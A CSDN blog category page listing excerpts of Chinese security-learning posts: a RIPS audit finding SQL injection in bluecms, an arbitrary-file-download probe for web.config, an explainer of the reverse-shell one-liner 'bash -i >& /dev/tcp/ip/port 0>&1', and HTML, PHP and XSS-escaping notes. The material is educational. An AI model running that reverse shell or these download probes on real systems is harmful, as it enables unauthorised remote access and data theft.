![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
代码
文章平均质量分 52
shy014
这个作者很懒,什么都没留下…
展开
-
代码审计之rips之bluecms审计
rips是一款代码审计工具,下载下来并放在网站跟目录就可以了,然后直接通过浏览器访问,很简单,傻瓜式的使用。 代码审计:https://nchc.dl.sourceforge.net/project/rips-scanner/rips-0.55.zip 使用phpstudy搭建你要审计的网站bluecms。 将rips解压放在网站根目录,然后使用浏览器访问。 输入网站路径进行代码审计。 一个一个的来看,先审计ad_js.php文件。 存在sql注入漏洞:1,get方式传入了ad_id原创 2021-03-12 20:38:49 · 433 阅读 · 0 评论 -
记一次对任意下载文章的学习
原文地址:https://mp.weixin.qq.com/s/Nbbe23hIcnKakSbkQzlw1w 查看下载功能点url: 漏洞思路1: 先访问下载的文件url是否在网站目录如是可尝试使用iis默认配置的web.config作为尝试 /get/?d=now&f=/web.config (发现该网站的中间件是IIS,因此尝试下载web.config配置文件) (可以测试是否存在robots.txt和favicon.ico,index.php文件,用于测试否存在任意文件下载原创 2020-12-31 14:48:50 · 211 阅读 · 0 评论 -
详解反弹shell命令
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地打开一个bash >& 输出重定向,将标准输出和标准错误输出都重定向到远程。 /dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...原创 2020-04-11 18:26:43 · 3498 阅读 · 0 评论 -
html学习笔记
HTML<div>标签 <div> 标签定义 HTML 文档中的一个分隔区块或者一个区域部分 文档中的一个区域将显示为蓝色: <div style="color:#0000FF"> <h3>这是一个在 div 元素中的标题。</h3> <p>这是一个在 div 元素中的文本。</p> </...原创 2020-03-18 09:58:32 · 88 阅读 · 0 评论 -
PHP函数笔记
htmlspecialchars():将特殊字符转换为html实体 $str = htmlspecialchars(string,flags,character-set,double_encode); string:规定要转换的字符串; flags :可选参数,规定如何处理引号、无效的编码以及使用哪种文档类型; character-set:可选参数,规定了要使用的字符集的字符串,e.g.U...原创 2020-01-20 14:19:29 · 477 阅读 · 0 评论 -
XSS函数研究
1,使用htmlspecialchars()函数将特殊字符转换为HTML实体 <?php $name=$_GET["name"]; $name=htmlspecialchars($name); ?> <input type='text' value='<?php echo $name?>'> 被转换的预定义的字符有: &:转换为&...原创 2020-03-12 14:44:20 · 1196 阅读 · 0 评论